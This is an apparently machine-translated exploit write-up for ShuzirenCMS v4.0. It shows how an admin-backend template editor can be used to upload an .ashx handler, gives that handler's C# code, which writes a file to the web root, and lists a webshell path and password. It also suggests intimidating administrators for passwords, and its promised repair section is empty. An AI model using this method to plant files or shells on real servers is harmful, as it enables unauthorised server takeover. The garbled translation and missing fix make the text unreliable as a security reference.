ShuzirenCMS v4.0 background Get Shell and repair

Let's take a look... It is found that no directory of the entire website is written to the directory of which the Asp Php script permission is blocked ~
Test Environment/system:
ShuzirenCMS v4.0/Windows
Whether you are a social worker, you need to dig, inject, sniff, and intimidate the background administrator to ask for the password...
Log on to the background> blog> template Management> Edit
Upload 1. ashx
1. ashx content:
1.
2. using System;
3. using System. Web;
4. using System. IO;
5. public class Handler: IHttpHandler {
6. public void ProcessRequest (HttpContext context ){
7. context. Response. ContentType = "text/plain ";
8. string show = "Hey web master, Have a nice day o. O? I hope so! HaHa ";
9. StreamWriter file1 = File. CreateText (context. Server. MapPath ("4z1. aspx "));
10. file1.Write (show );
11. file1.Flush ();
12. file1.Close ();
13.
14 .}
15.
16. public bool IsReusable {
17. get {
18. return false;
19 .}
20 .}
21.
22 .}
23.
Copy code
One sentence path generated after access:
 
Http://www.bkjia.com/4z1. aspx
 
Password:
RmB321654897123456789
The other is if the asp permission is writable.
Upload the aspshell extension of aasasa
Proof of vulnerability:
Haha1.jpg
Haha2.jpg

Www.2cto.com provides the repair solution:

The digital man is in our company. We will notify him in time... The webmaster must not disclose the background permissions.